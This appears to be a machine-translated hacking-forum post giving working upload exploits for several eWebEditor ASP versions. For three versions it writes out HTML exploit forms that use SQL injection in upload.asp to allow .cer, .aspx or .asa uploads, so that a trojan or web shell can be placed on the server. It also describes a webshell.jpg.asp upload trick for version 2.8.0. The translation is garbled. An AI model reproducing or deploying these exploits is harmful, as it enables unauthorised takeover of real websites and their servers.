You may often encounter situations where there is an ewebeditor but there is no way to update the style. This is often because the administrator sets the database as read-only for security purposes. Even if it is read-only, we can make a breakthrough. Theoretically, it can be used as long as the conditions are met and the database is the same, and the version number is not necessarily the same. As described in the following versions, you can save the file as an htm file:
1. ewebeditor 1.0.0 Upload Vulnerability: this vulnerability is based on the exp of the ice origin.
<H1> ewebeditor asp version 1.0.0 Upload Vulnerability exploitation program -- By HCocoa </H1> <br>
<Form action = "http: // address to be uploaded/ewebeditor/upload. asp? Action = save & type = IMAGE & style = hcocoa 'Union select S_ID, S_Name, S_Dir, S_EditorHeader, S_Body, S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt] % 2b '| cer | aspx', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, s_DetectFromWord from ewebeditor_style where s_name = 'standard' and 'a = 'a "method = post name = myform enctype =" multipart/form-data ">
<Input type = file name = previusfile size = 100> <br>
<Input type = submit value = Fuck>
</Form>
2. ewebeditor 2.1.6 Upload Vulnerability: this vulnerability is still written at the ice origin, and is found everywhere on the Internet:
<HTML> <HEAD> <TITLE> ewebeditor's upload File upload exp </TITLE> <meta http-equiv = "Content-Type" content = "text/html; charset = gb2312 "> <Tr> the version is different if it is not a killer! I'm depressed. JJ said the article was not clear, and this EXP was written according to the article! What's the difference between the EXP of the fallen guy I haven't seen for a long time! <Br> </tr>
<Tr> the file is transferred to the previusfile directory </tr> <br>
<Tr> I don't know if the calculation is zero day. I am the ice's origin </tr> <br>
<Tr> the method to use is to modify the action in the source file, and then pass the cer's Trojan! </Tr> <br>
<Form action = "http: // URL to be uploaded/ewebeditor/upload. asp? Action = save & type = IMAGE & style = firefox '% 20 union % 20 select % 20S_ID, S_Name, S_Dir, S_CSS, S_UploadDir, S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, s_FlashExt, % 20 [S_ImageExt] % 2b '| cer', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, s_BaseUrl % 20 from % 20ewebeditor_style % 20 where % 20s_name = 'standard' % 20and % 20' a' = a "method = post name = myform enctype =" multipart/form-data"> <input type = file name = previusfile size = 100 style = "width: 100% "> <input type = submit value = transfer it> </form>
3. ewebeditor 2.7.5 Upload Vulnerability: the author is not familiar with this vulnerability when the user can upload the asa but the prompt does not have a toolbar.
<Form action = "http: // URL to be uploaded/ewebedit/upload. asp? Action = save & type = & style = style name for uploading asa "method = post name = myform enctype =" multipart/form-data ">
<Input type = file name = previusfile size = 1 style = "width: 100%">
<Input type = submit value = "uploaded"> </input>
</Form>
4. ewebeditor 2.8.0 Upload Vulnerability: You need to enable remote upload and then upload webshell.jpg. asp. You can view the source code to obtain the shell address.